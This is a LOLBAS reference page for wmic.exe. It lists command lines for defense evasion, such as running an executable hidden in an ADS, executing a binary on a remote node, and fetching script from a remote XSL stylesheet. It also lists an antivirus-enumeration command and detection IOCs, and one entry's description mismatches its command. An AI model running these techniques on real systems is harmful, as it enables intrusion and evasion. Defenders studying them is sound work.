Catalog LOLBAS

LOL · Binary

Wmic.exe

7 techniques WindowsLOLBAS GPL-3.0

ADS

Defense EvasionFile Write Windows

Execute a .EXE file stored as an Alternate Data Stream (ADS)

Use Execute binary file hidden in Alternate data streams to evade defensive counter measures

wmic.exe process call create "{PATH_ABSOLUTE}:program.exe"
Context
user
Native
ADS
Detection
IOC: Wmic retrieving scripts from remote system/Internet location
IOC: DotNet CLR libraries loaded into wmic.exe
IOC: DotNet CLR Usage Log - wmic.exe.log
IOC: wmiprvse.exe writing files

Execute

Execution Windows

Execute calc from wmic

Use Execute binary from wmic to evade defensive counter measures

wmic.exe process call create "{CMD}"
Context
user
Native
Execute
MITRE
T1218
Detection
IOC: Wmic retrieving scripts from remote system/Internet location
IOC: DotNet CLR libraries loaded into wmic.exe
IOC: DotNet CLR Usage Log - wmic.exe.log
IOC: wmiprvse.exe writing files

Execute

Execution Windows

Execute evil.exe on the remote system.

Use Execute binary on a remote system

wmic.exe /node:"192.168.0.1" process call create "{CMD}"
Context
user
Native
Execute
MITRE
T1218
Detection
IOC: Wmic retrieving scripts from remote system/Internet location
IOC: DotNet CLR libraries loaded into wmic.exe
IOC: DotNet CLR Usage Log - wmic.exe.log
IOC: wmiprvse.exe writing files

Execute

Execution Windows

Create a volume shadow copy of NTDS.dit that can be copied.

Use Execute binary on remote system

wmic.exe process get brief /format:"{REMOTEURL:.xsl}"
Context
user
Native
Execute
MITRE
T1218
Detection
IOC: Wmic retrieving scripts from remote system/Internet location
IOC: DotNet CLR libraries loaded into wmic.exe
IOC: DotNet CLR Usage Log - wmic.exe.log
IOC: wmiprvse.exe writing files

Execute

Execution Windows

Executes JScript or VBScript embedded in the target remote XSL stylsheet.

Use Execute script from remote system

wmic.exe process get brief /format:"{PATH_SMB:.xsl}"
Context
user
Native
Execute
MITRE
T1218
Detection
IOC: Wmic retrieving scripts from remote system/Internet location
IOC: DotNet CLR libraries loaded into wmic.exe
IOC: DotNet CLR Usage Log - wmic.exe.log
IOC: wmiprvse.exe writing files

Copy

File Copy Windows

Copy file from source to destination.

Use Copy file.

wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"
Context
user
Native
Copy
MITRE
T1105
Detection
IOC: Wmic retrieving scripts from remote system/Internet location
IOC: DotNet CLR libraries loaded into wmic.exe
IOC: DotNet CLR Usage Log - wmic.exe.log
IOC: wmiprvse.exe writing files

Execute

Execution Windows

Executes WMIC to gather the existing Antivirus or EDR solution installed on the machine.

Use Recon

WMIC.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName,productState
Context
user
Native
Execute
Detection
IOC: Wmic retrieving scripts from remote system/Internet location
IOC: DotNet CLR libraries loaded into wmic.exe
IOC: DotNet CLR Usage Log - wmic.exe.log
IOC: wmiprvse.exe writing files